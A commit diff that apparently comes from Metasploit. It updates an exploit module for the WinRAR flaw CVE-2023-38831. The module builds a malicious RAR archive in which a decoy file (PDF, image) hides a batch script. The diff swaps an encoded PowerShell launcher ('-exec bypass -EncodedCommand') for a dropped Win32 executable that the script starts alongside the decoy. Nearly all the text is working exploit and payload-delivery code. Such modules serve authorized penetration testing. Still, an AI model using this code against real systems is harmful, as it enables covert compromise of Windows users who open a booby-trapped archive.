Update winrar_cve_2023_38831.rb

rapid7 · Sep 4, 2023 · 85ce965 · 85ce965
1 parent 2547de2
commit 85ce965
Showing 1 changed file with 10 additions and 10 deletions.
diff --git a/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb b/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
@@ -4,7 +4,6 @@ class MetasploitModule < Msf::Exploit
   Rank = ExcellentRanking
 
   include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -36,11 +35,14 @@ def initialize(info = {})
         }
       ))
 
-
     register_options([
       OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
       OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])
     ])
+
+    register_advanced_options([
+      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])
+    ])
   end
 
   def exploit
@@ -49,22 +51,19 @@ def exploit
     input_file = datastore['INPUT_FILE']
     decoy_name = File.basename(input_file)
     decoy_ext = ".#{File.extname(input_file)[1..]}"
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'
 
     decoy_dir = File.join(temp_dir, "#{decoy_name}A")
     Dir.mkdir(decoy_dir)
 
-    psh_payload = cmd_psh_payload(
-      payload.encoded,
-      payload_instance.arch.first,
-      remove_comspec: true,
-      wrap_double_quotes: true
-    )
+    exe_payload = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
 
-    base64_psh_payload = Rex::Text.encode_base64(psh_payload)
+    payload_path = File.join(decoy_dir, payload_name)
+    File.open(payload_path, "wb") { |file| file.write(exe_payload) }
 
     bat_script = <<~BAT
       @echo off
-      powershell -nop -exec bypass -EncodedCommand #{base64_psh_payload}
+      start "" "%~dp0#{payload_name}"
       start "" "%~dp0#{decoy_name}"
     BAT
 
@@ -77,6 +76,7 @@ def exploit
     Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
       zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
       zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
+      zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)
     end
 
     content = File.binread(zip_path)